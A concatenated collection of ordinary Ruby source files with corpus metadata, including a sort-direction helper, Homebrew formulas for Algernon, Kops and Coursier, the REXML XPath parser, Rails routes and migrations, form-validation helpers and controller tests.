# @direction.to_s # => "ASC"
# @direction.downcase # => 'asc'
# @direction.opposite # => 'DESC'
#
# SortDirection.new(:wrong).to_s # => 'ASC'
#
class SortDirection
##
# When given an unknown or nil direction, default to this value
DEFAULT_DIRECTION = "ASC"
##
# Possible sort direction values
DIRECTIONS = %w[ASC DESC]
##
# The direction represented as an uppercase, abbreviated String
attr_reader :direction
alias to_s direction
##
# The direction as uppercase
#
# Returns String
delegate :uppercase, to: :direction
##
# The direction as lowercase
#
# Returns String
delegate :downcase, to: :direction
# Initialize a new SortDirection
#
# direction - The direction (asc or desc) we want to sort results by
def initialize(direction = nil)
@direction = direction.to_s.upcase.presence_in(DIRECTIONS) || DEFAULT_DIRECTION
end
# The opposite direction to this one. Returns asc for desc, and desc for asc.
#
# Returns String
def opposite
@opposite ||= DIRECTIONS[DIRECTIONS.index(direction) - 1]
end
end
| 21.421053 | 83 | 0.687961 |
87cf691cf112c1b461425b83e957df0c9b1a2b4a
| 1,619 |
class Algernon < Formula
desc "Pure Go web server with Lua, Markdown, HTTP/2 and template support"
homepage "https://github.com/xyproto/algernon"
url "https://github.com/xyproto/algernon/archive/1.12.14.tar.gz"
sha256 "cab5b01923142e0326ea2a01797814bb2e8ea9f7c6c41a3ea0ae7df3b667e86e"
license "MIT"
version_scheme 1
head "https://github.com/xyproto/algernon.git", branch: "main"
livecheck do
url :stable
strategy :github_latest
end
bottle do
sha256 cellar: :any_skip_relocation, arm64_big_sur: "0eaa6910677a3aa0a1be868af31c73e7390d420f41c7950e905d6d52556bde0b"
sha256 cellar: :any_skip_relocation, big_sur: "ffe7eed6b3576166e41b66beecdccc47aabed4644119190a1534ec8210fb25cc"
sha256 cellar: :any_skip_relocation, catalina: "57e11ff2b146da5e254189058ec5502bda66d7213996daf8846756cca5de38ec"
sha256 cellar: :any_skip_relocation, mojave: "c06af8b3677a3d46e7be0160533e8da8b7512b848a24105d498c0a9b1d381125"
sha256 cellar: :any_skip_relocation, x86_64_linux: "ccdca9ac607c215c4981e35dc13101c5acc0533edd1a5441bd3c874dea275b2a" # linuxbrew-core
end
depends_on "go" => :build
def install
system "go", "build", *std_go_args, "-mod=vendor"
bin.install "desktop/mdview"
end
test do
port = free_port
pid = fork do
exec "#{bin}/algernon", "-s", "-q", "--httponly", "--boltdb", "tmp.db",
"--addr", ":#{port}"
end
sleep 20
output = shell_output("curl -sIm3 -o- http://localhost:#{port}")
assert_match(/200 OK.*Server: Algernon/m, output)
ensure
Process.kill("HUP", pid)
end
end
| 36.795455 | 139 | 0.723904 |
edd11277353ff705a0cad917dc16f5063edb21d3
| 20,926 |
# frozen_string_literal: false
require 'rexml/namespace'
require 'rexml/xmltokens'
require 'rexml/attribute'
require 'rexml/syncenumerator'
require 'rexml/parsers/xpathparser'
class Object
# provides a unified +clone+ operation, for REXML::XPathParser
# to use across multiple Object types
def dclone
clone
end
end
class Symbol
# provides a unified +clone+ operation, for REXML::XPathParser
# to use across multiple Object types
def dclone ; self ; end
end
class Fixnum
# provides a unified +clone+ operation, for REXML::XPathParser
# to use across multiple Object types
def dclone ; self ; end
end
class Float
# provides a unified +clone+ operation, for REXML::XPathParser
# to use across multiple Object types
def dclone ; self ; end
end
class Array
# provides a unified +clone+ operation, for REXML::XPathParser
# to use across multiple Object+ types
def dclone
klone = self.clone
klone.clear
self.each{|v| klone << v.dclone}
klone
end
end
module REXML
# You don't want to use this class. Really. Use XPath, which is a wrapper
# for this class. Believe me. You don't want to poke around in here.
# There is strange, dark magic at work in this code. Beware. Go back! Go
# back while you still can!
class XPathParser
include XMLTokens
LITERAL = /^'([^']*)'|^"([^"]*)"/u
def initialize( )
@parser = REXML::Parsers::XPathParser.new
@namespaces = nil
@variables = {}
end
def namespaces=( namespaces={} )
Functions::namespace_context = namespaces
@namespaces = namespaces
end
def variables=( vars={} )
Functions::variables = vars
@variables = vars
end
def parse path, nodeset
path_stack = @parser.parse( path )
match( path_stack, nodeset )
end
def get_first path, nodeset
path_stack = @parser.parse( path )
first( path_stack, nodeset )
end
def predicate path, nodeset
path_stack = @parser.parse( path )
expr( path_stack, nodeset )
end
def []=( variable_name, value )
@variables[ variable_name ] = value
end
# Performs a depth-first (document order) XPath search, and returns the
# first match. This is the fastest, lightest way to return a single result.
#
# FIXME: This method is incomplete!
def first( path_stack, node )
return nil if path.size == 0
case path[0]
when :document
# do nothing
return first( path[1..-1], node )
when :child
for c in node.children
r = first( path[1..-1], c )
return r if r
end
when :qname
name = path[2]
if node.name == name
return node if path.size == 3
return first( path[3..-1], node )
else
return nil
end
when :descendant_or_self
r = first( path[1..-1], node )
return r if r
for c in node.children
r = first( path, c )
return r if r
end
when :node
return first( path[1..-1], node )
when :any
return first( path[1..-1], node )
end
return nil
end
def match( path_stack, nodeset )
r = expr( path_stack, nodeset )
r
end
private
# Returns a String namespace for a node, given a prefix
# The rules are:
#
# 1. Use the supplied namespace mapping first.
# 2. If no mapping was supplied, use the context node to look up the namespace
def get_namespace( node, prefix )
if @namespaces
return @namespaces[prefix] || ''
else
return node.namespace( prefix ) if node.node_type == :element
return ''
end
end
# Expr takes a stack of path elements and a set of nodes (either a Parent
# or an Array and returns an Array of matching nodes
ALL = [ :attribute, :element, :text, :processing_instruction, :comment ]
ELEMENTS = [ :element ]
def expr( path_stack, nodeset, context=nil )
node_types = ELEMENTS
return nodeset if path_stack.length == 0 || nodeset.length == 0
while path_stack.length > 0
if nodeset.length == 0
path_stack.clear
return []
end
case (op = path_stack.shift)
when :document
nodeset = [ nodeset[0].root_node ]
when :qname
prefix = path_stack.shift
name = path_stack.shift
nodeset.delete_if do |node|
# FIXME: This DOUBLES the time XPath searches take
ns = get_namespace( node, prefix )
if node.node_type == :element
if node.name == name
end
end
!(node.node_type == :element and
node.name == name and
node.namespace == ns )
end
node_types = ELEMENTS
when :any
nodeset.delete_if { |node| !node_types.include?(node.node_type) }
when :self
# This space left intentionally blank
when :processing_instruction
target = path_stack.shift
nodeset.delete_if do |node|
(node.node_type != :processing_instruction) or
( target!='' and ( node.target != target ) )
end
when :text
nodeset.delete_if { |node| node.node_type != :text }
when :comment
nodeset.delete_if { |node| node.node_type != :comment }
when :node
# This space left intentionally blank
node_types = ALL
when :child
new_nodeset = []
nt = nil
nodeset.each do |node|
nt = node.node_type
new_nodeset += node.children if nt == :element or nt == :document
end
nodeset = new_nodeset
node_types = ELEMENTS
when :literal
return path_stack.shift
when :attribute
new_nodeset = []
case path_stack.shift
when :qname
prefix = path_stack.shift
name = path_stack.shift
for element in nodeset
if element.node_type == :element
attrib = element.attribute( name, get_namespace(element, prefix) )
new_nodeset << attrib if attrib
end
end
when :any
for element in nodeset
if element.node_type == :element
new_nodeset += element.attributes.to_a
end
end
end
nodeset = new_nodeset
when :parent
nodeset = nodeset.collect{|n| n.parent}.compact
#nodeset = expr(path_stack.dclone, nodeset.collect{|n| n.parent}.compact)
node_types = ELEMENTS
when :ancestor
new_nodeset = []
nodeset.each do |node|
while node.parent
node = node.parent
new_nodeset << node unless new_nodeset.include? node
end
end
nodeset = new_nodeset
node_types = ELEMENTS
when :ancestor_or_self
new_nodeset = []
nodeset.each do |node|
if node.node_type == :element
new_nodeset << node
while ( node.parent )
node = node.parent
new_nodeset << node unless new_nodeset.include? node
end
end
end
nodeset = new_nodeset
node_types = ELEMENTS
when :predicate
new_nodeset = []
subcontext = { :size => nodeset.size }
pred = path_stack.shift
nodeset.each_with_index { |node, index|
subcontext[ :node ] = node
subcontext[ :index ] = index+1
pc = pred.dclone
result = expr( pc, [node], subcontext )
result = result[0] if result.kind_of? Array and result.length == 1
if result.kind_of? Numeric
new_nodeset << node if result == (index+1)
elsif result.instance_of? Array
if result.size > 0 and result.inject(false) {|k,s| s or k}
new_nodeset << node if result.size > 0
end
else
new_nodeset << node if result
end
}
nodeset = new_nodeset
=begin
predicate = path_stack.shift
ns = nodeset.clone
result = expr( predicate, ns )
if result.kind_of? Array
nodeset = result.zip(ns).collect{|m,n| n if m}.compact
else
nodeset = result ? nodeset : []
end
=end
when :descendant_or_self
rv = descendant_or_self( path_stack, nodeset )
path_stack.clear
nodeset = rv
node_types = ELEMENTS
when :descendant
results = []
nt = nil
nodeset.each do |node|
nt = node.node_type
results += expr( path_stack.dclone.unshift( :descendant_or_self ),
node.children ) if nt == :element or nt == :document
end
nodeset = results
node_types = ELEMENTS
when :following_sibling
results = []
nodeset.each do |node|
next if node.parent.nil?
all_siblings = node.parent.children
current_index = all_siblings.index( node )
following_siblings = all_siblings[ current_index+1 .. -1 ]
results += expr( path_stack.dclone, following_siblings )
end
nodeset = results
when :preceding_sibling
results = []
nodeset.each do |node|
next if node.parent.nil?
all_siblings = node.parent.children
current_index = all_siblings.index( node )
preceding_siblings = all_siblings[ 0, current_index ].reverse
results += preceding_siblings
end
nodeset = results
node_types = ELEMENTS
when :preceding
new_nodeset = []
nodeset.each do |node|
new_nodeset += preceding( node )
end
nodeset = new_nodeset
node_types = ELEMENTS
when :following
new_nodeset = []
nodeset.each do |node|
new_nodeset += following( node )
end
nodeset = new_nodeset
node_types = ELEMENTS
when :namespace
new_nodeset = []
prefix = path_stack.shift
nodeset.each do |node|
if (node.node_type == :element or node.node_type == :attribute)
if @namespaces
namespaces = @namespaces
elsif (node.node_type == :element)
namespaces = node.namespaces
else
namespaces = node.element.namesapces
end
if (node.namespace == namespaces[prefix])
new_nodeset << node
end
end
end
nodeset = new_nodeset
when :variable
var_name = path_stack.shift
return @variables[ var_name ]
# :and, :or, :eq, :neq, :lt, :lteq, :gt, :gteq
# TODO: Special case for :or and :and -- not evaluate the right
# operand if the left alone determines result (i.e. is true for
# :or and false for :and).
when :eq, :neq, :lt, :lteq, :gt, :gteq, :or
left = expr( path_stack.shift, nodeset.dup, context )
right = expr( path_stack.shift, nodeset.dup, context )
res = equality_relational_compare( left, op, right )
return res
when :and
left = expr( path_stack.shift, nodeset.dup, context )
return [] unless left
if left.respond_to?(:inject) and !left.inject(false) {|a,b| a | b}
return []
end
right = expr( path_stack.shift, nodeset.dup, context )
res = equality_relational_compare( left, op, right )
return res
when :div
left = Functions::number(expr(path_stack.shift, nodeset, context)).to_f
right = Functions::number(expr(path_stack.shift, nodeset, context)).to_f
return (left / right)
when :mod
left = Functions::number(expr(path_stack.shift, nodeset, context )).to_f
right = Functions::number(expr(path_stack.shift, nodeset, context )).to_f
return (left % right)
when :mult
left = Functions::number(expr(path_stack.shift, nodeset, context )).to_f
right = Functions::number(expr(path_stack.shift, nodeset, context )).to_f
return (left * right)
when :plus
left = Functions::number(expr(path_stack.shift, nodeset, context )).to_f
right = Functions::number(expr(path_stack.shift, nodeset, context )).to_f
return (left + right)
when :minus
left = Functions::number(expr(path_stack.shift, nodeset, context )).to_f
right = Functions::number(expr(path_stack.shift, nodeset, context )).to_f
return (left - right)
when :union
left = expr( path_stack.shift, nodeset, context )
right = expr( path_stack.shift, nodeset, context )
return (left | right)
when :neg
res = expr( path_stack, nodeset, context )
return -(res.to_f)
when :not
when :function
func_name = path_stack.shift.tr('-','_')
arguments = path_stack.shift
subcontext = context ? nil : { :size => nodeset.size }
res = []
cont = context
nodeset.each_with_index { |n, i|
if subcontext
subcontext[:node] = n
subcontext[:index] = i
cont = subcontext
end
arg_clone = arguments.dclone
args = arg_clone.collect { |arg|
expr( arg, [n], cont )
}
Functions.context = cont
res << Functions.send( func_name, *args )
}
return res
end
end # while
return nodeset
end
##########################################################
# FIXME
# The next two methods are BAD MOJO!
# This is my achilles heel. If anybody thinks of a better
# way of doing this, be my guest. This really sucks, but
# it is a wonder it works at all.
# ########################################################
def descendant_or_self( path_stack, nodeset )
rs = []
d_o_s( path_stack, nodeset, rs )
document_order(rs.flatten.compact)
#rs.flatten.compact
end
def d_o_s( p, ns, r )
nt = nil
ns.each_index do |i|
n = ns[i]
x = expr( p.dclone, [ n ] )
nt = n.node_type
d_o_s( p, n.children, x ) if nt == :element or nt == :document and n.children.size > 0
r.concat(x) if x.size > 0
end
end
# Reorders an array of nodes so that they are in document order
# It tries to do this efficiently.
#
# FIXME: I need to get rid of this, but the issue is that most of the XPath
# interpreter functions as a filter, which means that we lose context going
# in and out of function calls. If I knew what the index of the nodes was,
# I wouldn't have to do this. Maybe add a document IDX for each node?
# Problems with mutable documents. Or, rewrite everything.
def document_order( array_of_nodes )
new_arry = []
array_of_nodes.each { |node|
node_idx = []
np = node.node_type == :attribute ? node.element : node
while np.parent and np.parent.node_type == :element
node_idx << np.parent.index( np )
np = np.parent
end
new_arry << [ node_idx.reverse, node ]
}
new_arry.sort{ |s1, s2| s1[0] <=> s2[0] }.collect{ |s| s[1] }
end
def recurse( nodeset, &block )
for node in nodeset
yield node
recurse( node, &block ) if node.node_type == :element
end
end
# Builds a nodeset of all of the preceding nodes of the supplied node,
# in reverse document order
# preceding:: includes every element in the document that precedes this node,
# except for ancestors
def preceding( node )
ancestors = []
p = node.parent
while p
ancestors << p
p = p.parent
end
acc = []
p = preceding_node_of( node )
while p
if ancestors.include? p
ancestors.delete(p)
else
acc << p
end
p = preceding_node_of( p )
end
acc
end
def preceding_node_of( node )
psn = node.previous_sibling_node
if psn.nil?
if node.parent.nil? or node.parent.class == Document
return nil
end
return node.parent
#psn = preceding_node_of( node.parent )
end
while psn and psn.kind_of? Element and psn.children.size > 0
psn = psn.children[-1]
end
psn
end
def following( node )
acc = []
p = next_sibling_node( node )
while p
acc << p
p = following_node_of( p )
end
acc
end
def following_node_of( node )
if node.kind_of? Element and node.children.size > 0
return node.children[0]
end
return next_sibling_node(node)
end
def next_sibling_node(node)
psn = node.next_sibling_node
while psn.nil?
if node.parent.nil? or node.parent.class == Document
return nil
end
node = node.parent
psn = node.next_sibling_node
end
return psn
end
def norm b
case b
when true, false
return b
when 'true', 'false'
return Functions::boolean( b )
when /^\d+(\.\d+)?$/
return Functions::number( b )
else
return Functions::string( b )
end
end
def equality_relational_compare( set1, op, set2 )
if set1.kind_of? Array and set2.kind_of? Array
if set1.size == 1 and set2.size == 1
set1 = set1[0]
set2 = set2[0]
elsif set1.size == 0 or set2.size == 0
nd = set1.size==0 ? set2 : set1
rv = nd.collect { |il| compare( il, op, nil ) }
return rv
else
res = []
SyncEnumerator.new( set1, set2 ).each { |i1, i2|
i1 = norm( i1 )
i2 = norm( i2 )
res << compare( i1, op, i2 )
}
return res
end
end
# If one is nodeset and other is number, compare number to each item
# in nodeset s.t. number op number(string(item))
# If one is nodeset and other is string, compare string to each item
# in nodeset s.t. string op string(item)
# If one is nodeset and other is boolean, compare boolean to each item
# in nodeset s.t. boolean op boolean(item)
if set1.kind_of? Array or set2.kind_of? Array
if set1.kind_of? Array
a = set1
b = set2
else
a = set2
b = set1
end
case b
when true, false
return a.collect {|v| compare( Functions::boolean(v), op, b ) }
when Numeric
return a.collect {|v| compare( Functions::number(v), op, b )}
when /^\d+(\.\d+)?$/
b = Functions::number( b )
return a.collect {|v| compare( Functions::number(v), op, b )}
else
b = Functions::string( b )
return a.collect { |v| compare( Functions::string(v), op, b ) }
end
else
# If neither is nodeset,
# If op is = or !=
# If either boolean, convert to boolean
# If either number, convert to number
# Else, convert to string
# Else
# Convert both to numbers and compare
s1 = set1.to_s
s2 = set2.to_s
if s1 == 'true' or s1 == 'false' or s2 == 'true' or s2 == 'false'
set1 = Functions::boolean( set1 )
set2 = Functions::boolean( set2 )
else
if op == :eq or op == :neq
if s1 =~ /^\d+(\.\d+)?$/ or s2 =~ /^\d+(\.\d+)?$/
set1 = Functions::number( s1 )
set2 = Functions::number( s2 )
else
set1 = Functions::string( set1 )
set2 = Functions::string( set2 )
end
else
set1 = Functions::number( set1 )
set2 = Functions::number( set2 )
end
end
return compare( set1, op, set2 )
end
return false
end
def compare a, op, b
case op
when :eq
a == b
when :neq
a != b
when :lt
a < b
when :lteq
a <= b
when :gt
a > b
when :gteq
a >= b
when :and
a and b
when :or
a or b
else
false
end
end
end
end
| 29.68227 | 94 | 0.545637 |
62aa2cbc22a4bf006cdeaf313a5023d641f889f3
| 145 |
# frozen_string_literal: true
class ContractTemplateSerializer < ActiveModel::Serializer
attributes :id, :template_file, :template_name
end
| 24.166667 | 58 | 0.813793 |
280f27e928129968cef0585f7eea1c79e20d15e7
| 160 |
module FullMessagesHelper
def full_messages(post)
post.errors.full_messages.each do |message|
message # rubocop:disable Lint/Void
end
end
end
| 20 | 47 | 0.7375 |
9130663767f165bc75520c6aef0efc1d990d62ec
| 52 |
json.partial! "my_blogs/my_blog", my_blog: @my_blog
| 26 | 51 | 0.769231 |
e8aec593b9f269d86b1b59526c54f895ce76eb9d
| 1,266 |
class Kops < Formula
desc "Production Grade K8s Installation, Upgrades, and Management"
homepage "https://github.com/kubernetes/kops"
url "https://github.com/kubernetes/kops/archive/1.12.2.tar.gz"
sha256 "e453bfd39a8bd079a14cf8d8c1b22d1429ccd4f5701b55f3612528263aeb97e6"
head "https://github.com/kubernetes/kops.git"
bottle do
cellar :any_skip_relocation
sha256 "f8edc1b5c421fc18a911db6210e2e7c34158c3c9ebb7b5e6afd06acfd3325e78" => :mojave
sha256 "93ec062792caac6be68f00605d9dcecf69a824dd2bca89ff2eda85d8cd54a186" => :high_sierra
sha256 "57e12bf567e1340d0f8fd82fd025479ebc3d6527215252cd42eedf164ec11e2b" => :sierra
end
depends_on "go" => :build
depends_on "kubernetes-cli"
def install
ENV["VERSION"] = version unless build.head?
ENV["GOPATH"] = buildpath
kopspath = buildpath/"src/k8s.io/kops"
kopspath.install Dir["*"]
system "make", "-C", kopspath
bin.install("bin/kops")
# Install bash completion
output = Utils.popen_read("#{bin}/kops completion bash")
(bash_completion/"kops").write output
# Install zsh completion
output = Utils.popen_read("#{bin}/kops completion zsh")
(zsh_completion/"_kops").write output
end
test do
system "#{bin}/kops", "version"
end
end
| 32.461538 | 93 | 0.734597 |
6a09a9b176b9cd9a13f5f17a5035780a5344d9b2
| 88 |
module GithubApi
module V4
class Client
VERSION = '0.2.0'
end
end
end
| 11 | 23 | 0.602273 |
7a1f6c11f40b570dce58dfc741e48f78b23d2238
| 415 |
require File.expand_path('../../../../spec_helper', __FILE__)
require 'mathn'
ruby_version_is '1.9' do
describe 'Kernel#Rational' do
it 'returns an Integer if denominator divides numerator evenly' do
Rational(42,6).should == 7
Rational(42,6).should be_kind_of(Fixnum)
Rational(bignum_value,1).should == bignum_value
Rational(bignum_value,1).should be_kind_of(Bignum)
end
end
end
| 31.923077 | 70 | 0.706024 |
182e082bc5f9f29f55dda44170c1b00a8bec83ba
| 125 |
namespace :refresh do
task :public_db, [:force] => :environment do |t|
Util::DbManager.new.refresh_public_db
end
end
| 20.833333 | 50 | 0.712 |
87c97c677ea47e08e06b4f2955345b88e9036ecb
| 266 |
# frozen_string_literal: true
Rails.application.routes.draw do
get 'welcome/ins'
# For details on the DSL available within this file, see http://guides.rubyonrails.org/routing.html
resources :articles do
resources :comments
end
root 'welcome#ins'
end
| 24.181818 | 101 | 0.755639 |
26eac74212cf4ad47c785a9920f831bf53c78f01
| 129 |
class AddQuestionListToMedium < ActiveRecord::Migration[5.1]
def change
add_column :media, :question_list, :text
end
end
| 21.5 | 60 | 0.75969 |
ff5bf971c5f8a794dba8e81ea86fe0248b36f7db
| 958 |
require "minitest_helper"
class NewsletterControllerTest < ActionController::TestCase
def test_subscribe_to_discussion
mock = MiniTest::Mock.new
params = ActionController::Parameters.new('email' => '[email protected]').permit!
mock.expect :call, nil, [params]
ZenspiderSubscriber.stub :subscribe_to_discussion, mock do
post :subscribe, params: { :subscribe => {:person => {:email => '[email protected]'}, :subscribe_to_discussion => "1"} }
end
assert_mock mock
assert_redirected_to join_us_path
end
def test_subscribe_to_jobs
mock = MiniTest::Mock.new
params = ActionController::Parameters.new('email' => '[email protected]').permit!
mock.expect :call, nil, [params]
ZenspiderSubscriber.stub :subscribe_to_jobs, mock do
post :subscribe, params: { :subscribe => {:person => {:email => '[email protected]'}, :subscribe_to_jobs => "1"} }
end
assert_mock mock
assert_redirected_to join_us_path
end
end
| 29.9375 | 120 | 0.699374 |
b9f5763a5f7f405d3b302778593dbd6894978ef0
| 891 |
class Coursier < Formula
desc "Pure Scala Artifact Fetching"
homepage "https://get-coursier.io/"
url "https://github.com/coursier/coursier/releases/download/v2.1.0-M5/coursier.jar"
version "2.1.0-M5"
sha256 "4e9041524151a4213e71a6d76daae41307b5aeaed643257188618f1d99e8486d"
license "Apache-2.0"
livecheck do
url :stable
regex(/^v?(\d+(?:\.\d+)+(?:-M\d+)?)$/i)
end
bottle do
sha256 cellar: :any_skip_relocation, all: "a038325f8ddd5715b495a8af5a1880b1bec056a46f622c123516a7bd8d1da103"
end
depends_on "openjdk"
def install
(libexec/"bin").install "coursier.jar"
chmod 0755, libexec/"bin/coursier.jar"
(bin/"coursier").write_env_script libexec/"bin/coursier.jar", Language::Java.overridable_java_home_env
end
test do
system bin/"coursier", "list"
assert_match "scalafix", shell_output("#{bin}/coursier search scalafix")
end
end
| 28.741935 | 112 | 0.722783 |
abfeda960ff547e7cd001d29e2671454e07b7657
| 5,225 |
# frozen_string_literal: true
require 'client_side_validations/core_ext'
require 'client_side_validations/extender'
require 'client_side_validations/active_model/conditionals'
module ClientSideValidations
module ActiveModel
module Validator
def client_side_hash(model, attribute, _force = nil)
build_client_side_hash(model, attribute, options.dup)
end
def copy_conditional_attributes(attribute_to, attribute_from)
%i[if unless].each { |key| attribute_to[key] = attribute_from[key] if attribute_from[key].present? }
end
private
def build_client_side_hash(model, attribute, options)
{ message: model.errors.generate_message(attribute, message_type, options) }.merge(options.except(*callbacks_options - %i[allow_blank if unless]))
end
def message_type
kind
end
def callbacks_options
if defined?(::ActiveModel::Errors::CALLBACKS_OPTIONS)
::ActiveModel::Errors::CALLBACKS_OPTIONS
else
::ActiveModel::Error::CALLBACKS_OPTIONS
end
end
end
module Validations
include ClientSideValidations::ActiveModel::Conditionals
ATTRIBUTES_DENYLIST = [nil, :block].freeze
def client_side_validation_hash(force = nil)
_validators.inject({}) do |attr_hash, attr|
next attr_hash if ATTRIBUTES_DENYLIST.include?(attr[0])
validator_hash = validator_hash_for(attr, force)
if validator_hash.present?
attr_hash.merge!(attr[0] => validator_hash)
else
attr_hash
end
end
end
private
def validator_hash_for(attr, force)
attr[1].each_with_object(Hash.new { |h, k| h[k] = [] }) do |validator, kind_hash|
next unless can_use_for_client_side_validation?(attr[0], validator, force)
client_side_hash = validator.client_side_hash(self, attr[0], extract_force_option(attr[0], force))
if client_side_hash
kind_hash[validator.kind] << client_side_hash.except(:on, :if, :unless)
end
end
end
def extract_force_option(attr, force)
case force
when FalseClass, TrueClass, NilClass
force
when Hash
extract_force_option(nil, force[attr])
end
end
def can_use_for_client_side_validation?(attr, validator, force)
return false if validator_turned_off?(attr, validator, force)
result = check_new_record(validator)
result &&= validator.kind != :block
if validator.options[:if] || validator.options[:unless]
check_conditionals attr, validator, force
else
result
end
end
# Yeah yeah, #new_record? is not part of ActiveModel :p
def check_new_record(validator)
(respond_to?(:new_record?) && validator.options[:on] == (new_record? ? :create : :update)) || validator.options[:on].nil?
end
def will_save_change?(options)
options.is_a?(Symbol) && (options.to_s.end_with?('changed?') || options.to_s.start_with?('will_save_change_to'))
end
def check_conditionals(attr, validator, force)
return true if validator.options[:if] && will_save_change?(validator.options[:if])
result = can_force_validator?(attr, validator, force)
if validator.options[:if]
result &&= run_conditionals(validator.options[:if], :if)
end
if validator.options[:unless]
result &&= run_conditionals(validator.options[:unless], :unless)
end
result
end
def validator_turned_off?(attr, validator, force)
return true if ::ClientSideValidations::Config.disabled_validators.include?(validator.kind)
case force
when FalseClass
true
when Hash
case force[attr]
when FalseClass
true
when Hash
force[attr][validator.kind] == false
else
false
end
else
false
end
end
def can_force_validator?(attr, validator, force)
case force
when TrueClass
true
when Hash
case force[attr]
when TrueClass
true
when Hash
force[attr][validator.kind]
else
false
end
else
false
end
end
end
module EnumerableValidator
def client_side_hash(model, attribute, force = nil)
options = self.options.dup
if options[:in].respond_to?(:call)
return unless force
options[:in] = options[:in].call(model)
end
hash = build_client_side_hash(model, attribute, options)
if hash[:in].is_a?(Range)
hash[:range] = hash[:in]
hash.delete(:in)
end
hash
end
end
end
end
ActiveModel::Validator.include ClientSideValidations::ActiveModel::Validator
ActiveModel::Validations.include ClientSideValidations::ActiveModel::Validations
ClientSideValidations::Extender.extend 'ActiveModel', %w[Absence Acceptance Exclusion Format Inclusion Length Numericality Presence]
| 28.708791 | 154 | 0.631388 |
abfefd2d50735829d510afdc1a27e7901a63bbdd
| 3,407 |
# encoding: utf-8
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
module Azure::Web::Mgmt::V2020_09_01
module Models
#
# Body of the error response returned from the API.
#
class ErrorEntity
include MsRestAzure
# @return [String] Type of error.
attr_accessor :extended_code
# @return [String] Message template.
attr_accessor :message_template
# @return [Array<String>] Parameters for the template.
attr_accessor :parameters
# @return [Array<ErrorEntity>] Inner errors.
attr_accessor :inner_errors
# @return [String] Basic error code.
attr_accessor :code
# @return [String] Any details of the error.
attr_accessor :message
#
# Mapper for ErrorEntity class as Ruby Hash.
# This will be used for serialization/deserialization.
#
def self.mapper()
{
client_side_validation: true,
required: false,
serialized_name: 'ErrorEntity',
type: {
name: 'Composite',
class_name: 'ErrorEntity',
model_properties: {
extended_code: {
client_side_validation: true,
required: false,
serialized_name: 'extendedCode',
type: {
name: 'String'
}
},
message_template: {
client_side_validation: true,
required: false,
serialized_name: 'messageTemplate',
type: {
name: 'String'
}
},
parameters: {
client_side_validation: true,
required: false,
serialized_name: 'parameters',
type: {
name: 'Sequence',
element: {
client_side_validation: true,
required: false,
serialized_name: 'StringElementType',
type: {
name: 'String'
}
}
}
},
inner_errors: {
client_side_validation: true,
required: false,
serialized_name: 'innerErrors',
type: {
name: 'Sequence',
element: {
client_side_validation: true,
required: false,
serialized_name: 'ErrorEntityElementType',
type: {
name: 'Composite',
class_name: 'ErrorEntity'
}
}
}
},
code: {
client_side_validation: true,
required: false,
serialized_name: 'code',
type: {
name: 'String'
}
},
message: {
client_side_validation: true,
required: false,
serialized_name: 'message',
type: {
name: 'String'
}
}
}
}
}
end
end
end
end
| 28.630252 | 70 | 0.449662 |
ff96bba7917f75588130886b5fd8f35514c00df9
| 2,444 |
require 'statsample-glm/glm/irls/logistic'
require 'statsample-glm/glm/irls/poisson'
require 'statsample-glm/glm/mle/logistic'
require 'statsample-glm/glm/mle/probit'
require 'statsample-glm/glm/mle/normal'
module Statsample
module GLM
class Base
def initialize ds, y, opts={}
@opts = opts
set_default_opts_if_any
@data_set = ds.dup(ds.vectors.to_a - [y])
@dependent = ds[y]
add_constant_vector if @opts[:constant]
add_constant_vector(1) if self.is_a? Statsample::GLM::Normal
algorithm = @opts[:algorithm].upcase
method = @opts[:method].capitalize
# TODO: Remove this const_get jugaad after 1.9.3 support is removed.
@regression = Kernel.const_get("Statsample").const_get("GLM")
.const_get("#{algorithm}").const_get("#{method}")
.new(@data_set, @dependent, @opts)
end
def coefficients as_a=:array
if as_a == :hash
c = {}
@data_set.vectors.to_a.each_with_index do |f,i|
c[f.to_sym] = @regression.coefficients[i]
end
return c
end
create_vector @regression.coefficients
end
def standard_error as_a=:array
if as_a == :hash
se = {}
@data_set.vectors.to_a.each_with_index do |f,i|
se[f.to_sym] = @regression.standard_error[i]
end
return se
end
create_vector @regression.standard_error
end
def iterations
@regression.iterations
end
def fitted_mean_values
@regression.fitted_mean_values
end
def residuals
@regression.residuals
end
def degree_of_freedom
@regression.degree_of_freedom
end
def log_likelihood
@regression.log_likelihood if @opts[:algorithm] == :mle
end
private
def set_default_opts_if_any
@opts[:algorithm] ||= :irls
@opts[:iterations] ||= 100
@opts[:epsilon] ||= 1e-7
@opts[:link] ||= :log
end
def create_vector arr
Daru::Vector.new(arr)
end
def add_constant_vector x=nil
@data_set.add_vector :constant, [@opts[:constant]]*@data_set.nrows
unless x.nil?
@data_set.add_vector :constant, [1]*@data_set.nrows
end
end
end
end
end
| 25.195876 | 77 | 0.578969 |
bb1cb15c5e936ccb34be3e134a8081648c178e1d
| 1,913 |
require File.expand_path('../boot', __FILE__)
require 'active_model/railtie'
require 'active_record/railtie'
require 'action_controller/railtie'
require 'action_view/railtie'
require 'action_mailer/railtie'
Bundler.require
require 'has_accounts'
module Dummy
class Application < Rails::Application
# Settings in config/environments/* take precedence over those specified here.
# Application configuration should go into files in config/initializers
# -- all .rb files in that directory are automatically loaded.
# Custom directories with classes and modules you want to be autoloadable.
# config.autoload_paths += %W(#{config.root}/extras)
# Only load the plugins named here, in the order given (default is alphabetical).
# :all can be used as a placeholder for all plugins not explicitly named.
# config.plugins = [ :exception_notification, :ssl_requirement, :all ]
# Activate observers that should always be running.
# config.active_record.observers = :cacher, :garbage_collector, :forum_observer
# Set Time.zone default to the specified zone and make Active Record auto-convert to this zone.
# Run "rake -D time" for a list of tasks for finding time zone names. Default is UTC.
# config.time_zone = 'Central Time (US & Canada)'
# The default locale is :en and all translations from config/locales/*.rb,yml are auto loaded.
# config.i18n.load_path += Dir[Rails.root.join('my', 'locales', '*.{rb,yml}').to_s]
# config.i18n.default_locale = :de
# JavaScript files you want as :defaults (application.js is always included).
# config.action_view.javascript_expansions[:defaults] = %w(jquery rails)
# Configure the default encoding used in templates for Ruby 1.9.
config.encoding = 'utf-8'
# Configure sensitive parameters which will be filtered from the log file.
config.filter_parameters += [:password]
end
end
| 41.586957 | 99 | 0.734971 |
7a81827388a006fac41cca985bbe5aedc0efbbf8
| 8,566 |
=begin
#Selling Partner API for Direct Fulfillment Transaction Status
#The Selling Partner API for Direct Fulfillment Transaction Status provides programmatic access to a direct fulfillment vendor's transaction status.
OpenAPI spec version: v1
